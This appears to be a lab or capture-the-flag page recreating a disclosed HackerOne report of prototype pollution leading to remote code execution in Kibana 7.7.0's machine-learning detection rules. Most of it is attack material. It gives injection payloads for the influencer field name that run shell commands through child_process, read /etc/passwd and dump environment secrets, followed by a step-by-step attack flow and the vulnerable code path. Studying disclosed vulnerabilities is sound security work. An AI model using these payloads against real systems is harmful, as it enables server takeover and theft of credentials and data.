Detection rules
Kibana 7.7.0
SIEM Detection Engine — Machine Learning rule evaluation via
bulk_create_ml_signals.ts
Detection Rules
1 anomalie(s) indexed
| Rule name | Type | Severity | Status | Last response | Actions |
|---|---|---|---|---|---|
|
Linux Anomalous Network Activity
ML Job: linux_anomalous_network_activity_ecs · interval: 15s
|
Machine Learning | Low | ● Enabled | Fired: 2026-06-05 15:25:12 |
Elasticsearch API — Index ML Anomaly Document
Step 2 — craft the malicious anomaly document
Rule Execution Log — Signals
Previous execution at 2026-06-05 15:25:12 —
Proto pollution: sourceURL ·
sh: 1: /etc/passwd: Permission denied
...
Payload Reference
influencer_field_name injection payloads
① Detection — arithmetic check
"foo.__proto__.sourceURL": "\u2028\u2029\n;console.log('pwned')"
② Read Node.js version
"foo.__proto__.sourceURL": "\u2028\u2029\n;process.version"
③ Env var exfil — FLAG
"foo.__proto__.sourceURL": "\u2028\u2029\n;process.env.FLAG"
④ RCE — exec command (from report)
"foo.__proto__.sourceURL": "\u2028\u2029\n;global.process.mainModule.require('child_process').exec('id')"
⑤ File read — /etc/passwd
"foo.__proto__.sourceURL": "\u2028\u2029\n;require('fs').readFileSync('/etc/passwd','utf8')"
// vulnerable code path
// bulk_create_ml_signals.ts#L58
influencers.forEach(inf => {
const nested = {};
// BUG: field_name used as key path
set(nested, inf.influencer_field_name, ...
merge(signalSource, nested); // ← __proto__ traversal
});
Attack Flow
1
Ensure rule is enabled
2
Set
influencer_field_name = foo.__proto__.sourceURL
3
Set
influencer_field_values = \u2028\u2029\n;[code]
4
Click Send Request — rule fires in ~15s
✓
RCE output appears in Signals log
HackerOne Report Metadata
Report
Researcher
alexbrasetvik
Program
Elastic
Severity
Critical (9–10)
Weakness
Prototype Pollution → RCE
Bounty
$5,000
Reported
Apr 28, 2020
Disclosed
Apr 19, 2021
Affected file
bulk_create_ml_signals.ts#L58